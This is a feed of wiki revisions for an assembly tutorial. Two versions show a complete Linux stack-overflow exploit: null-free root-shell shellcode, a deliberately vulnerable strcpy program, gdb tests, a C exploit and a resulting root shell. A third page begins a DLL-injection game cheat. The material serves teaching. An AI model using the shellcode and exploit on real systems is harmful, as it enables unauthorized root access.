https://wiki.skullsecurity.org/api.php?action=feedcontributions&user=Killboy&feedformat=atomSkullSecurity - User contributions [en]2024-03-29T14:51:10ZUser contributionsMediaWiki 1.36.1https://wiki.skullsecurity.org/index.php?title=Example_4&diff=3167Example 42012-01-20T04:43:11Z<p>Killboy: /* Local Exploits */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root (superuser) privileges. For example, programs that need access to the /etc/shadow file require root access, since the shadow file is inaccessible to normal users. If a user can take control of such a program and make it run a shell, the shell will run as the same user as the program, which is root. From there, the attacker can run any program with root access, which means full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (i.e., a program that runs as its owner, in this case root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker.<br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruid, uid_t euid)<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address of the pointer to "/bin/sh" (this is argv)<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top to get this<br />
; address<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. The shellcode can be replaced with any other assembly, provided it contains no 00 bytes. A common modification is changing the shellcode to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks.<br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a programmer forgets to check how much data can safely be copied, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then, when the "ret" instruction is issued and pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if more than<br />
* 39 characters are entered (the 40-byte buffer must also hold the<br />
* terminating null). The exploit for it was written by Jon Erickson in<br />
* Hacking: The Art of Exploitation, but I wrote this vulnerable code<br />
* independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings in the ''gdb'' debugger: first 40 characters, then 50, then 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x33323130. Remembering ASCII, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. Because x86 is little-endian, the bytes appear in reverse order when read as an address, so the return address was overwritten by the final 0123. This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I rewrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (see below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: StackExploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc StackExploit.c -o StackExploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: The Art of Exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same command-line arguments, this string<br />
* will be in the same position in memory, which lets us set the return address<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identically, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, (char *)NULL);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. The cast assumes 32-bit pointers, as on the x86 target. */<br />
*((unsigned int *)(exploit + 60)) = (unsigned int)string;<br />
<br />
/* Finally, now call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, (char *)NULL);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is made SetUID root (i.e., it runs as root), and then the exploit program is run:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary for learning assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only point at one of the nop instructions. If any nop instruction is hit, it runs and does nothing, then the next one runs and also does nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
nop-slides (also called nop sleds) are very common in exploits, unless the return address is in a predictable location.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_4&diff=3165Example 42012-01-20T04:34:50Z<p>Killboy: /* Shellcode */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root (superuser) privileges. For example, programs that need access to the password file require root access, since the password file is unreadable by ordinary users. If a user can take control of such a program and make it run a shell, the shell will run as the same user as the program, which is root. From there, the attacker can run any program with root access, which means full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (i.e., a program that runs as its owner, in this case root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker. <br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruid, uid_t euid)<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address that points to /bin/sh<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top, which pushes the address of the string below<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
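<br />
If you'd rather not check the hexdump by eye, here is a minimal sketch that counts the 00 bytes for you. The bytes are copied from the hexdump above; the helper name count_null_bytes is made up for this illustration. <br />
```c
#include <assert.h>
#include <stddef.h>

/* The 46 bytes of machine code from the hexdump above. */
static const unsigned char shellcode[] = {
    0x31, 0xc0, 0xb0, 0x46, 0x31, 0xdb, 0x31, 0xc9,
    0xcd, 0x80, 0xeb, 0x16, 0x5b, 0x31, 0xc0, 0x88,
    0x43, 0x07, 0x89, 0x5b, 0x08, 0x89, 0x43, 0x0c,
    0xb0, 0x0b, 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c,
    0xcd, 0x80, 0xe8, 0xe5, 0xff, 0xff, 0xff, 0x2f,
    0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68
};

/* Hypothetical helper: returns how many 0x00 bytes appear in buf. */
size_t count_null_bytes(const unsigned char *buf, size_t len)
{
    size_t i, count = 0;

    assert(buf != NULL);
    for (i = 0; i < len; i++)
        if (buf[i] == 0x00)
            count++;
    return count;
}
```
Calling count_null_bytes(shellcode, sizeof(shellcode)) should return 0 for shellcode that is safe to pass around as a C string. <br />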
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. This shellcode can be changed to any assembly (provided there are no 00 bytes). A common modification is changing the shellcode to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks.<br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a programmer forgets to check how much data the program can copy, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then when the "ret" instruction is issued, and ret pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
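<br />
To see the idea without crashing anything, here is a small simulation. It is only a sketch: the "frame" is an ordinary byte array whose first 8 bytes play the role of the local array and whose last 4 bytes play the role of the return address. The sizes, the function name simulate_copy and the starting address 0x08048123 are all made up, and a real frame usually has other things (saved registers, other locals) in between. <br />
```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE   8                               /* size of the simulated local array */
#define FRAME_SIZE (BUF_SIZE + sizeof(uint32_t))   /* array + simulated return address  */

/* Copies len bytes of input into the start of a simulated frame without
 * checking len against BUF_SIZE, then returns the simulated return
 * address that sits right after the array. */
uint32_t simulate_copy(const unsigned char *input, size_t len)
{
    unsigned char frame[FRAME_SIZE];
    uint32_t ret = 0x08048123;   /* made-up "legitimate" return address */

    assert(input != NULL);
    assert(len <= FRAME_SIZE);   /* keep the simulation itself in bounds */

    memset(frame, 0, BUF_SIZE);
    memcpy(frame + BUF_SIZE, &ret, sizeof ret);

    memcpy(frame, input, len);   /* the unchecked copy */

    memcpy(&ret, frame + BUF_SIZE, sizeof ret);
    return ret;
}
```
With 4 bytes of input the return address survives; with "12345678AAAA" (12 bytes) the last four bytes land on top of it and it comes back as 0x41414141. <br />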
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if 40 or more<br />
* characters are entered. The exploit for it was written by<br />
* Jon Erickson in Hacking: Art of exploitation, but I wrote<br />
* this vulnerable code independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings, in the ''gdb'' debugger, starting at 40 characters, then 50, 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x33323130. Remembering ASCII, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. That means that the return address was overwritten by the 0123. This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
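<br />
The step from a crash address back to characters can be sketched in a few lines of C. The function name address_to_chars is hypothetical; the only assumption is that the target is little-endian (as x86 is), so the lowest byte of the address is the first character in memory. <br />
```c
#include <assert.h>
#include <stdint.h>

/* Writes the four bytes of addr into out in little-endian memory order,
 * followed by a terminating NUL. */
void address_to_chars(uint32_t addr, char out[5])
{
    int i;

    assert(out != 0);
    for (i = 0; i < 4; i++)
        out[i] = (char) ((addr >> (8 * i)) & 0xFF);
    out[4] = '\0';
}
```
Passing 0x33323130 gives the string "0123", which is how we know which four characters of the argument ended up in the return address. <br />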
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I re-wrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (See below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: StackExploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc StackExploit.c -o StackExploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: Art of exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same commandline arguments, this string<br />
* will be in the same position in memory, which lets us set the return address<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identically, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, 0);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. */<br />
*((int*)(exploit + 60)) = (int) &string;<br />
<br />
/* Finally, now call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, 0);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is set to be SetUID (ie, run as root), and is run with the exploit program:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary to assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only be one of the nop instructions. If any nop instruction is hit, it runs, doing nothing, the next one runs, also doing nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
nop sleds are very common in exploits, unless the return address is in a predictable location.<br />
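<br />
Here is a toy model of why the nops help. Nothing is executed; the sketch just walks a byte buffer the way the processor would walk a run of nop (0x90) instructions. The function name slide is made up for this illustration. <br />
```c
#include <assert.h>
#include <stddef.h>

#define NOP 0x90

/* Starting at a guessed offset, skips over nop bytes and returns the
 * offset of the first non-nop byte, ie, where the shellcode would start
 * running. */
size_t slide(const unsigned char *buf, size_t len, size_t guess)
{
    assert(buf != NULL);
    assert(guess < len);

    while (guess < len && buf[guess] == NOP)
        guess++;
    return guess;
}
```
If the buffer holds 16 nops followed by shellcode, any guess from 0 to 15 ends up at offset 16, so the attacker has 16 acceptable return addresses instead of one. <br />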
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_7&diff=3164Example 72012-01-16T23:25:33Z<p>Killboy: /* Creating the .dll */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is what this entire tutorial has been building up to: writing a cheat for a game! <br />
<br />
I have chosen the simplest cheat I can think of that demonstrates most of the concepts I've attempted to teach: displaying a notification whenever a player spends minerals in Starcraft. <br />
<br />
This demonstration will use Starcraft 1.05. There are two reasons:<br />
* So it can't easily be translated to modern versions, which should avoid pissing off Blizzard. <br />
* Because the newer versions break TSearch, and I don't really want to find/write another memory searcher. <br />
<br />
Two locations need to be found:<br />
* The function that can be called to display messages on-screen. <br />
* The function that is called when minerals are spent. <br />
<br />
== Creating the .dll ==<br />
This .dll will be written in Microsoft Visual Studio and injected with my [http://www.javaop.com/~ron/programs/Inject.zip Injector]. <br />
<br />
Here's how to create the .dll (this works in Visual Studio 2005):<br />
* Run Visual Studio.<br />
* Create a new project.<br />
* Choose "Win32 Console Application" and give it a name.<br />
* In the wizard, set the application type to "DLL".<br />
* Disable "Precompiled header" (you don't have to, but I prefer to). <br />
<br />
I generally start by removing all the crap that Visual Studio adds, then I add a switch over the two conditions I care about. Here's the starting code:<br />
<br />
<pre><br />
#include <stdio.h><br />
#include <windows.h><br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
break;<br />
}<br />
<br />
return TRUE;<br />
}<br />
</pre><br />
<br />
This should compile into a .dll file, which can be injected/ejected (though it does nothing).<br />
<br />
== Displaying Messages ==<br />
Finding the function to call is always tricky. It goes back to the same principle as finding the place to crack a game: you have to find a starting point, and trace your way to the appropriate function. Depending on the game, this could be significantly difficult. <br />
<br />
Some ways to do this might be:<br />
* Searching for messages you see on the screen. <br />
* Typing a message, searching in memory for it, and pressing enter.<br />
* Figuring out how events in Use Map Settings games work. <br />
<br />
The first message I think of that's displayed on-screen is chat messages from other players, which look like "player: message". Another common chat message is "[team] player: message". That seems like a good place to start looking. <br />
<br />
